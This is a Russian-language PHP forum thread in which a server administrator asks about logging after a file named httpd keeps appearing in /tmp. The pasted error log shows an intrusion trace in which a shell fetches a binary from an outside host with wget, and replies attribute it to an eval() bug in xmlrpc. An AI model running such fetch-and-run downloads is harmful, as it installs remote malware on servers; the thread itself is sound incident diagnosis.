настройки ведения лога

Fakir

в работе над собой
настройки ведения лога

Приветствую.

С недавного времени стал замечать что на сервер, в папку /tmp падает файло httpd. Мое подозрение на дырки в PHP скриптах. Обсмотрел все логи, пусто, подозрительных URL нет, в error единственное, но это уже как результат...:

httpd(24897): Operation not permitted
httpd(14232): Operation not permitted
httpd(14233): Operation not permitted
httpd(14234): Operation not permitted
...
sh: line 1: fetch: command not found
--01:28:58-- http://audiovu.com/httpd
=> `httpd'
Resolving audiovu.com... done.
Connecting to audiovu.com[216.185.97.89]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33,927 [application/octet-stream]

0K ..httpd(24897): Operation not permitted
httpd(14232): Operation not permitted
httpd(14233): Operation not permitted
...


Вопрос, может есть инструмент в PHP, чтоб в логи писались например операции с диском?
 

ys

отодвинутый новичок
Посмотрите на содержимое Вашего /tmp
И посмотрите, что выдаст:
ps axwwwu | grep perl

Очень похоже, что вас имеют через xmlrpc

-~{}~ 14.02.06 13:54:

Еще error_log для php можно включить.
из php.ini:
log_errors = on
error_log = .......
log_errors_max_len = 0
report_memleaks = On
 

Alexandre

PHPПенсионер
Вопрос, может есть инструмент в PHP, чтоб в логи писались например операции с диском?
если будет ошибка I/O то она будет отражена в логе.
отностительно есть такой инструмент или нет - ничего не скажу, так как не понял, что подразумевается : "писались операции с диском"
 

ys

отодвинутый новичок
Да все просто, експлуатация бага с передачей параметром в eval() в xmlrpc, о котором я тут уже писал в свое время.
 
Сверху